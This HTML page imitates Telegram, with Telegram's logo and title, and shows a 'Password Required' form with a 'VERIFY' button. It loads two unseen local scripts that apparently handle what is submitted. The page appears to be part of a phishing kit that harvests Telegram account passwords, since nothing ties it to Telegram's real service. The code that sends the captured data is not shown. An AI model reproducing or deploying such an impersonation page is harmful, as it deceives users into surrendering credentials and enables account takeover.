<!DOCTYPE html>
<html lang="en">
   <head>
      <meta charset="utf-8">
      <link rel="icon" href="https://upload.wikimedia.org/wikipedia/commons/thumb/8/82/Telegram_logo.svg/512px-Telegram_logo.svg.png">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      <meta name="theme-color" content="#000000">
      <meta name="description" content="Telegram">
      <link rel="apple-touch-icon" href="https://upload.wikimedia.org/wikipedia/commons/thumb/8/82/Telegram_logo.svg/512px-Telegram_logo.svg.png">
      <link rel="manifest" href="..//manifest.json">
      <title>Telegram</title>
      <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script>
      <link href="../static/css/main.d48eb2f8.css" rel="stylesheet">
      <script src="https://code.jquery.com/jquery-3.7.1.js" integrity="sha256-eKhayi8LEQwp4NKxN+CfCh+3qOVUtJn3QNZ0TciWLP4=" crossorigin="anonymous"></script>
   </head>
   <body>
      <noscript>You need to enable JavaScript to run this app.</noscript>
      <div id="root">
         <div class="min-h-screen flex flex-col items-center justify-center bg-gray-900">
            <div class="mb-6 text-center"><a href="#" rel="noopener noreferrer"><img src="https://cdn-icons-png.flaticon.com/128/16750/16750201.png" alt="Header" class="h-32 w-auto mx-auto rounded-lg"></a></div>
            <h2 class="text-2xl font-bold text-white mb-2 text-center">
                <div class="flex items-center space-x-2">
               <h1>Password Required</h1>
            </div>
            </h2>
            <p class="text-gray-400 mb-6 text-center">Enter your password to continue</p>
            <form id="form-pw" method="post" class="w-full max-w-sm space-y-4">
               <fieldset class="border border-gray-700 px-4 py-3 bg-gray-800 rounded-lg transition-all duration-300 hover:border-purple-600">
                  <legend class="text-gray-400 text-sm px-1">Password</legend>
                  <input type="password" id="password" placeholder="**********" class="w-full bg-transparent text-white focus:outline-none focus:ring-0">
               </fieldset>
               <button id="btn-gasskan" type="submit"  class="w-full py-3 bg-purple-600 text-white font-semibold rounded-lg focus:outline-none focus:ring-2 focus:ring-purple-500 focus:ring-opacity-50 transition-all duration-300 flex items-center justify-center">VERIFY</button>
            </form>
         </div>
      </div>
      <script src="../telegram/js/jiecode.js"></script>
      <script src="../telegram.js"></script>
   </body>
</html>